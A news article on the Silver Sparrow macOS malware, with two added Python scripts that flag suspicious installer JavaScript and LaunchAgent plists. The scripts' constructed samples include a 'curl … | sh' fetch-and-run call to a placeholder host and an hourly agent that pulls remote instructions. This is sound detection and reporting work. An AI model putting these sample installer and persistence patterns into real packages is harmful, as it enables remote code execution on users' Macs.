Mysterious Silver Sparrow malware hits 30,000 macOS devices

The cluster is among the first to spread malware affecting devices fitted with Apple’s new M1 chip


Researchers have identified a novel cluster of macOS-specific malware strains that have infected almost 30,000 Mac endpoints across the world, including machines fitted with Apple’s new M1 CPU.

Dubbed Silver Sparrow, the malware strains use a LaunchAgent to establish persistence on a victim's machine and use JavaScript for execution. Most worrying of all is its apparent compatibility with the M1 ARM64 architecture, according to the Red Canary researchers who have tracked the cluster's activities.

There are two versions of the Silver Sparrow malware that have targeted 29,139 macOS endpoints as of 17 February combined. Infections were discovered across 153 countries but there were high volumes of detection recorded in the UK, US, Canada, France and Germany. 

The chief difference between the two strains is that the first contains only a Mach-O binary compiled for Intel architecture, while the second includes a binary compiled for both Intel and M1 CPUs. This makes Silver Sparrow among the first strains detected to target the recently developed 5nm macOS processor.

The installer packages of both strains use the macOS Installer JavaScript API to execute suspicious commands. This is something normally found in legitimate software and represents the first time Red Canary's researchers have observed this in malware. Malware ordinarily uses pre-install or post-install scripts to execute commands.
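The point above is that a .pkg can run commands from the JavaScript inside its Distribution file (invoked through hooks such as `installation-check`, with `system.run()` executing an arbitrary program) rather than from the usual pre-install or post-install scripts. The following Python triage check is an added example for this article, not Red Canary's tooling; both Distribution documents it inspects are constructed samples with placeholder names and hostnames, not material taken from Silver Sparrow.

```python
"""Triage a macOS installer Distribution file for JavaScript that launches programs.

Added example; not Red Canary's tooling. The two Distribution documents below are
constructed and do not reproduce Silver Sparrow. Installer.app evaluates the
JavaScript in <script> when a hook such as <installation-check script="..."/>
names a function, and system.run(path, args...) lets that JavaScript execute a
program before any package payload is installed.
"""
import re
import xml.etree.ElementTree as ET

# Constructed sample: the installation-check hook runs JavaScript that hands control
# to /bin/sh and pipes remote content into it. The hostname is a placeholder.
SUSPICIOUS_DISTRIBUTION = """<?xml version="1.0" encoding="utf-8"?>
<installer-gui-script minSpecVersion="1">
    <title>Example Updater</title>
    <installation-check script="installationCheck()"/>
    <script>
    function installationCheck() {
        system.run('/bin/sh', '-c', 'curl -s http://placeholder.invalid/stage1 | sh');
        return true;
    }
    </script>
    <choices-outline><line choice="default"/></choices-outline>
    <choice id="default"><pkg-ref id="com.example.pkg"/></choice>
    <pkg-ref id="com.example.pkg" version="1.0">#example.pkg</pkg-ref>
</installer-gui-script>
"""

# Constructed sample: JavaScript used only for an OS version comparison, which is
# the ordinary legitimate use of the Installer JavaScript API.
BENIGN_DISTRIBUTION = """<?xml version="1.0" encoding="utf-8"?>
<installer-gui-script minSpecVersion="1">
    <title>Example App</title>
    <installation-check script="installationCheck()"/>
    <script>
    function installationCheck() {
        return system.compareVersions(system.version.ProductVersion, '10.13') >= 0;
    }
    </script>
    <choices-outline><line choice="default"/></choices-outline>
    <choice id="default"><pkg-ref id="com.example.app"/></choice>
    <pkg-ref id="com.example.app" version="2.0">#app.pkg</pkg-ref>
</installer-gui-script>
"""

# Interpreters whose appearance as a system.run() target means the installer is
# executing arbitrary code rather than a fixed helper.
SHELL_NAMES = {"sh", "bash", "zsh", "osascript", "python", "python3", "perl"}
SYSTEM_RUN = re.compile(r"""system\.run\(\s*['"]([^'"]+)['"]""")


def extract_scripts(distribution_xml: str) -> list:
    """Return the JavaScript text of every <script> element in the document."""
    root = ET.fromstring(distribution_xml)
    return [node.text or "" for node in root.iter("script")]


def system_run_targets(script_text: str) -> list:
    """Return the program path passed as the first argument of each system.run() call."""
    return SYSTEM_RUN.findall(script_text)


def triage_distribution(distribution_xml: str) -> dict:
    """Summarise which JavaScript hooks a Distribution file declares and what they run."""
    root = ET.fromstring(distribution_xml)
    hooks = []
    for tag in ("installation-check", "volume-check"):
        node = root.find(tag)
        if node is not None and node.get("script"):
            hooks.append(tag)
    targets = []
    for script in extract_scripts(distribution_xml):
        targets.extend(system_run_targets(script))
    spawns_shell = any(t.rsplit("/", 1)[-1] in SHELL_NAMES for t in targets)
    # Any system.run() from installer JavaScript is unusual enough to inspect; a shell
    # interpreter as its target is the pattern the article describes.
    return {
        "hooks": hooks,
        "system_run_targets": targets,
        "spawns_shell": spawns_shell,
        "flag": bool(targets),
    }


if __name__ == "__main__":
    for name, doc in (("suspicious", SUSPICIOUS_DISTRIBUTION), ("benign", BENIGN_DISTRIBUTION)):
        print(name, triage_distribution(doc))
```

To run this against a real package, expand it first with `pkgutil --expand Example.pkg outdir` and pass the contents of `outdir/Distribution` to `triage_distribution`. The check deliberately flags every `system.run()` call, not only shell targets, because legitimate installers almost never need to spawn a process from their JavaScript at all.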

Once the installer has run its commands, several scripts exist on disk. The first executes immediately after installation and contacts a system controlled by the attackers to signal that installation is complete; the second executes periodically, thanks to the persistent LaunchAgent, and contacts the command and control server for further instructions.

A LaunchAgent is a way of instructing the macOS initialisation system to run tasks automatically on a schedule. This one tells the system to execute a shell script that downloads a JSON file to disk, converts it into a plist and uses its properties to determine further actions.

The server is checked every hour for additional instructions and downloadable content, including malicious URLs. Curiously, the researchers had not observed a final payload being delivered over the course of more than a week, so they have not been able to determine Silver Sparrow's actual purpose.
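The persistence mechanism just described has a recognisable shape in a LaunchAgent plist: a timer key such as `StartInterval`, a shell interpreter with an inline `-c` command as the program, and a command that fetches remote content and converts it with `plutil`. The script below is an added example of checking a plist for that shape; it is not Red Canary's detection logic, and both plists it classifies are constructed samples with placeholder labels and hostnames rather than Silver Sparrow indicators.

```python
"""Flag LaunchAgents that periodically run a shell command fetching remote instructions.

Added example; not Red Canary's detection logic. Both plists are constructed and
contain no real Silver Sparrow indicators. The pattern checked is the one the
article describes: launchd runs the job on a timer, the program is a shell with an
inline command, and that command downloads content and converts it with plutil.
"""
import os
import plistlib
import re

# Constructed sample: hourly '/bin/sh -c' job that pulls JSON, converts it to a plist
# and reads it back. The hostname is a placeholder.
SUSPICIOUS_AGENT = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
    <key>Label</key><string>com.example.updatecheck</string>
    <key>ProgramArguments</key>
    <array>
        <string>/bin/sh</string>
        <string>-c</string>
        <string>curl -s http://placeholder.invalid/config.json -o /tmp/cfg.json &amp;&amp; plutil -convert xml1 /tmp/cfg.json -o /tmp/cfg.plist &amp;&amp; /usr/bin/defaults read /tmp/cfg.plist</string>
    </array>
    <key>StartInterval</key><integer>3600</integer>
    <key>RunAtLoad</key><true/>
</dict>
</plist>
"""

# Constructed sample: an ordinary periodic agent that runs a local binary directly,
# with no shell wrapper and no network fetch.
BENIGN_AGENT = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
    <key>Label</key><string>com.example.backup</string>
    <key>ProgramArguments</key>
    <array>
        <string>/Applications/Example.app/Contents/MacOS/backup-helper</string>
        <string>--quiet</string>
    </array>
    <key>StartInterval</key><integer>3600</integer>
</dict>
</plist>
"""

SHELLS = {"sh", "bash", "zsh"}
DOWNLOADERS = {"curl", "wget"}
URL = re.compile(r"""https?://[^\s'"]+""")


def program_arguments(agent: dict) -> list:
    """Return the argv launchd will use, from ProgramArguments or the Program key."""
    if agent.get("ProgramArguments"):
        return list(agent["ProgramArguments"])
    return [agent["Program"]] if "Program" in agent else []


def inline_shell_command(argv: list) -> str:
    """Return the inline command when argv is '<shell> -c <command>', otherwise ''."""
    if len(argv) >= 3 and os.path.basename(argv[0]) in SHELLS and argv[1] == "-c":
        return argv[2]
    return ""


def classify_agent(plist_bytes: bytes) -> dict:
    """Score one LaunchAgent plist against the periodic-download pattern."""
    agent = plistlib.loads(plist_bytes)
    argv = program_arguments(agent)
    command = inline_shell_command(argv)
    # Split the inline command on whitespace and shell operators so 'curl' and
    # 'plutil' are found even when chained with && or |.
    words = [os.path.basename(w) for w in re.split(r"[\s|&;]+", command) if w]
    periodic = "StartInterval" in agent or "StartCalendarInterval" in agent
    downloads = bool(DOWNLOADERS & set(words))
    urls = URL.findall(command)
    converts_plist = "plutil" in words
    reasons = []
    if periodic and command:
        reasons.append("periodic shell -c job")
    if downloads or urls:
        reasons.append("fetches remote content")
    if converts_plist:
        reasons.append("converts downloaded file with plutil")
    return {
        "label": agent.get("Label", ""),
        "interval_seconds": agent.get("StartInterval"),
        "urls": urls,
        "reasons": reasons,
        "flagged": periodic and bool(command) and (downloads or bool(urls)),
    }


if __name__ == "__main__":
    for sample in (SUSPICIOUS_AGENT, BENIGN_AGENT):
        print(classify_agent(sample))
```

On a real endpoint the same function would be applied to every plist under `~/Library/LaunchAgents` and `/Library/LaunchAgents`. The verdict is built from the combination of timer, shell wrapper and network fetch rather than any one of them, since plenty of legitimate agents run on a schedule and some legitimately use `curl`; it is the whole chain, ending in a downloaded file being turned into a plist and read back, that matches the behaviour the article describes.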

“At the time of publishing, we’ve identified a few unknown factors related to Silver Sparrow that we either don’t have visibility into or simply enough time hasn’t passed to observe,” said Red Canary intelligence analyst Tony Lambert.

“We have no way of knowing with certainty what payload would be distributed by the malware, if a payload has already been delivered and removed, or if the adversary has a future timeline for distribution. Based on data shared with us by Malwarebytes, the nearly 30,000 affected hosts have not downloaded what would be the next or final payload.”


This is in addition to several other mysteries, including how users initially download the file and the presence of a file check that removes all persistence mechanisms and scripts. Above all, the Mach-O binary included with the malware only runs if a victim intentionally seeks it out and launches it, and then shows messages such as "Hello, World!" and "You did it!", suggesting the threat is perhaps still under development at a proof-of-concept stage.

Red Canary doesn’t have an accurate picture of when Silver Sparrow first emerged, but through its investigations determined that it perhaps first arose in August 2020, with the M1 version springing up for the first time in September.
